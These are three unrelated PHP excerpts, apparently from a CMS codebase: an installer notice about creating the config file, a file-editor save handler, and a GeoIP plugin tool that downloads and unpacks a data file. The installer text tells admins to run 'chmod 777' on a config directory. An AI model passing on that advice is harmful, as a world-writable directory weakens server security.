<p><strong><?php printf(T_('We cannot automatically create or update your config file [%s]!'), $conf_filepath); ?> </strong></p> <p><?php echo T_('There are two ways to deal with this:'); ?> </p> <ul> <li><strong><?php echo T_('You can allow the installer to create the config file by changing permissions for the /conf directory:'); ?> </strong> <ol> <li><?php printf(T_('Make sure there is no existing and potentially locked configuration file named <code>%s</code>. If so, please delete it.'), $conf_filepath); ?> </li> <li><?php printf(T_('<code>chmod 777 %s</code>. If needed, see the <a %s>online manual about permissions</a>.'), $conf_path, 'href="' . get_manual_url('directory-and-file-permissions') . '" target="_blank"'); ?> </li> <li><?php echo T_('Come back to this page and refresh/reload.'); ?> </li> </ol> <br /> </li> <li><strong><?php echo T_('Alternatively, you can update the config file manually:'); ?> </strong> <ol> <li><?php echo T_('Create a new text file with a text editor.'); ?> </li> <li><?php echo T_('Copy the contents from the box below.'); ?> </li> <li><?php echo T_('Paste them into your local text editor. <strong>ATTENTION: make sure there is ABSOLUTELY NO WHITESPACE after the final <code>?></code> in the file.</strong> Any space, tab, newline or blank line at the end of the conf file may prevent cookies from being set when you try to log in later.'); ?> </li> <li><?php echo T_('Save the file locally under the name <code>_basic_config.php</code>'); ?> </li> <li><?php echo T_('Upload the file to your server, into the <code>/_conf</code> folder.'); ?> </li> <li><?php printf(T_('<a %s>Call the installer from scratch</a>.'), 'href="index.php?locale=' . $default_locale . '"'); ?> </li> </ol> </li> </ul> <p><?php echo T_('This is how your _basic_config.php should look like:'); ?> </p> <blockquote> <pre><?php echo htmlspecialchars($conf); ?> </pre> </blockquote> <?php if (!$params['print_messages']) { // Return all messages instead of printing on screen $basic_config_file_result_messages = ob_get_clean(); } return false; } } if (!$params['print_messages']) { // Return all messages instead of printing on screen $basic_config_file_result_messages = ob_get_clean(); } return true; }
// Check permission! $current_User->check_perm('files', 'edit_allowed', true, $selected_Filelist->get_FileRoot()); // Get the file we want to update: $edited_File =& $selected_Filelist->get_by_idx(0); // Check that the file is editable: if (!$edited_File->is_editable($current_User->check_perm('files', 'all'))) { $Messages->add(sprintf(T_('You are not allowed to edit «%s».'), $edited_File->dget('name')), 'error'); break; } param('file_content', 'html', '', false); $fpath = $edited_File->get_full_path(); if (file_exists($fpath) && !is_writeable($fpath)) { $Messages->add(sprintf('The file «%s» is not writable.', rel_path_to_base($fpath)), 'error'); break; } if (save_to_file($file_content, $fpath, 'w+')) { $Messages->add(sprintf(T_('The file «%s» has been updated.'), $edited_File->dget('name')), 'success'); } else { $Messages->add(sprintf(T_('The file «%s» could not be updated.'), $edited_File->dget('name')), 'error'); } header_redirect(regenerate_url('', '', '', '&')); // $action = 'list'; break; } // Do we want to display the directory tree next to the files table $UserSettings->param_Request('fm_hide_dirtree', 'fm_hide_dirtree', 'integer', 0, true); /** * Filelist */ $fm_Filelist = new Filelist($fm_FileRoot, $ads_list_path); $Debuglog->add('FM _rds_list_path: ' . var_export($fm_Filelist->_rds_list_path, true), 'files');
/** * Event handler: Called when displaying the block in the "Tools" menu. * * @see Plugin::AdminToolPayload() */ function AdminToolPayload($params) { $action = param_action(); echo '<a name="geoip" style="position:relative;top:-60px"></a>'; switch ($action) { case 'geoip_download': // Display a process of downloading of GeoIP.dat global $admin_url; $this->print_tool_log(sprintf(T_('Downloading GeoIP.dat file from the url: %s ...'), '<a href="' . $this->geoip_download_url . '" target="_blank">' . $this->geoip_download_url . '</a>')); // DOWNLOAD: $gzip_contents = fetch_remote_page($this->geoip_download_url, $info, 1800); if ($gzip_contents === false || $info['status'] != 200) { // Downloading is Failed if (empty($info['error'])) { // Some unknown error $this->print_tool_log(T_('The URL is not available. It may correspond to an old version of the GeoIP.dat file.'), 'error'); } else { // Display an error of request $this->print_tool_log(T_($info['error']), 'error'); } break; } $this->print_tool_log(' OK.<br />'); $plugin_dir = dirname(__FILE__); if (!is_writable($plugin_dir)) { // Check the write rights $this->print_tool_log(sprintf(T_('Plugin folder %s must be writable to receive GeoIP.dat. Please fix the write permissions and try again.'), '<b>' . $plugin_dir . '</b>'), 'error'); break; } $gzip_file_name = explode('/', $this->geoip_download_url); $gzip_file_name = $gzip_file_name[count($gzip_file_name) - 1]; $gzip_file_path = $plugin_dir . '/' . $gzip_file_name; if (!save_to_file($gzip_contents, $gzip_file_path, 'w')) { // Impossible to save file... $this->print_tool_log(sprintf(T_('Unable to create file: %s'), '<b>' . $gzip_file_path . '</b>'), 'error'); if (file_exists($gzip_file_path)) { // Remove file from disk if (!@unlink($gzip_file_path)) { // File exists without the write rights $this->print_tool_log(sprintf(T_('Unable to remove file: %s'), '<b>' . $gzip_file_path . '</b>'), 'error'); } } break; } // UNPACK: $this->print_tool_log(sprintf(T_('Extracting of the file %s...'), '<b>' . $gzip_file_path . '</b>')); if (!function_exists('gzopen')) { // No extension $this->print_tool_log(T_('There is no \'zip\' or \'zlib\' extension installed!'), 'error'); break; } if (!($gzip_handle = @gzopen($gzip_file_path, 'rb'))) { // Try to open gzip file $this->print_tool_log(T_('Could not open the source file!'), 'error'); break; } if (!($out_handle = @fopen($plugin_dir . '/' . str_replace('.gz', '', $gzip_file_name), 'w'))) { $this->print_tool_log(sprintf(T_('The file %s cannot be written to disk. Please check the filesystem permissions.'), '<b>' . $plugin_dir . '/' . str_replace('.gz', '', $gzip_file_name) . '</b>'), 'error'); break; } $i = 0; while (!gzeof($gzip_handle)) { // Extract file by 4Kb fwrite($out_handle, gzread($gzip_handle, 4096)); if ($i == 100) { // Display the process dots after each 400Kb $this->print_tool_log(' .'); $i = 0; } $i++; } $this->print_tool_log(' OK.<br />'); fclose($out_handle); gzclose($gzip_handle); $this->print_tool_log(sprintf(T_('Remove gzip file %s...'), '<b>' . $gzip_file_path . '</b>')); if (@unlink($gzip_file_path)) { $this->print_tool_log(' OK.<br />'); } else { // Failed on removing $this->print_tool_log(sprintf(T_('Impossible to remove the file %s. You can do it manually.'), $gzip_file_path), 'warning'); } // Success message $this->print_tool_log('<br /><span class="text-success">' . sprintf(T_('%s file was downloaded successfully.'), 'GeoIP.dat') . '</span>'); // Try to enable plugin automatically: global $Plugins; $enable_return = $this->BeforeEnable(); if ($enable_return === true) { // Success enabling $this->print_tool_log('<br /><span class="text-success">' . T_('The plugin has been enabled.') . '</span>'); if ($this->status != 'enabled') { // Enable this plugin automatically: $Plugins->set_Plugin_status($this, 'enabled'); } } else { // Some restriction for enabling $this->print_tool_log('<br /><span class="text-warning">' . T_('The plugin could not be automatically enabled.') . '</span>'); if ($this->status != 'needs_config') { // Make this plugin incomplete because it cannot be enabled: $Plugins->set_Plugin_status($this, 'needs_config'); } } break; default: // Display a form to find countries for users if ($this->status != 'enabled') { // Don't allow use this tool when GeoIP plugin is not enabled echo '<p class="error">' . T_('You must enable the GeoIP plugin before to use this tool.') . '</p>'; break; } $Form = new Form(); $Form->begin_form('fform'); $Form->add_crumb('tools'); $Form->hidden_ctrl(); // needed to pass the "ctrl=tools" param $Form->hiddens_by_key(get_memorized()); // needed to pass all other memorized params, especially "tab" $Form->hidden('action', 'geoip_find_country'); echo '<p>' . T_('This tool finds all users that do not have a registration country yet and then assigns them a registration country based on their registration IP.') . get_manual_link('geoip-plugin') . '</p>'; $Form->button(array('value' => T_('Find Registration Country for all Users NOW!'))); if (!empty($this->text_from_AdminTabAction)) { // Display a report of executed action echo '<p><b>' . T_('Report') . ':</b></p>'; echo $this->text_from_AdminTabAction; } $Form->end_form(); break; } }